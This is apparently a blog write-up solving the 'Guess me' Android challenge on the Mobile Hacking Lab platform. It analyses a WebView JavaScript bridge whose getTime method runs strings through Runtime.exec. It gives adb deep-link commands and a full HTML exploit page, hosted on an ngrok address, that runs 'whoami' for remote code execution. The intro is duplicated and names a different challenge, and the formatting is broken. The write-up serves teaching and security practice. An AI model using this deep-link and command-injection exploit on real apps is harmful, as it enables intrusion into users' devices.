Guess me
Hello everyone , In this blog post , I will try to explain my solution steps for Guess me challenge from Mobile Hacking Lab Platform . i hope it will be useful for you
Hello everyone , In this blog post , I will try to explain my solution steps for IOT Connect challenge from Mobile Hacking Lab Platform . i hope it will be useful for you
Let's install our app then open the application . we found that : it’s a game that have a random number and when you put the right guess you won
image.png During Analysis the AndroidManifest.xml file we found 2 important Activity : the
MainActivity
andWebView activity
use ( mhl schema )Let’s Analysis the First one (
MainActivity
) : i found an important method :startNewGame()
: First generate a random number (Secret number ) , then Reset the attempt to 0 , display an initial message , then use enable user interact to input textValidateGuess()
: retrieve the user input then identify if it high or low comparing with the real value , then check if it valid or not , if it success then display congrats message , if it not display fail messageenable/disable input ()
: it make user able to input or not
Let’s Analysis the Sec one (
WebviewActivity
) : i found an important method :oncreate()
:enable JS
in our app ,add JS Interface
that make the js code interact with the app ,,android Bridge
is the name that the WebView will use it to interact with the appisValidDeepLink()
: validates URLs based on : URLs with the schemesmhl
orhttps
and the hostmobilehackinglab
. It also checks that theurl
query parameter ends with"mobilehackinglab.com"
.MyJavaScriptInterface class
loadWebsite()
: take the URL and check for it not null then Load it inside the WebViewgetTime()
: take the string and then execute it in the system because it useRuntime.getRuntime().exec(Time);
,, then useStream
toread the result of execution
and thenconvert the data to txt file
Let’s test it using adb :
adb shell am start -n com.mobilehackinglab.guessme/.WebviewActivity -d "mhl://mobilehackinglab?url=https://google.com/mobilehackinglab.com"
then we can call the method inside
MyJavaScriptInterface
class and write a malicious JS to callgetTime ()
code contain malicious argument and load it via the deep link from a public server to achieve RCE<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <p id="result">Thank you for visiting</p> <!-- Add a hyperlink with onclick event --> <a href="#" onclick="executeCommand()">Execute Command</a> <script> function executeCommand() { try { var result = AndroidBridge.getTime("whoami"); var lines = result.split('\\n'); var timeVisited = lines[0]; var fullMessage = "Command: " + timeVisited; document.getElementById('result').innerText = fullMessage; window.location.href = "https://www.mobilehackinglab.com/"; } catch (e) { console.error("Error calling getTime:", e); } } </script> </body> </html>
let’s use this exploit with adb :
adb shell am start -W -a android.intent.action.VIEW -d "mhl://mobilehackinglab/?url= [https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com](https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com)"
and here we already execute whoami command and then we get RCE
Last updated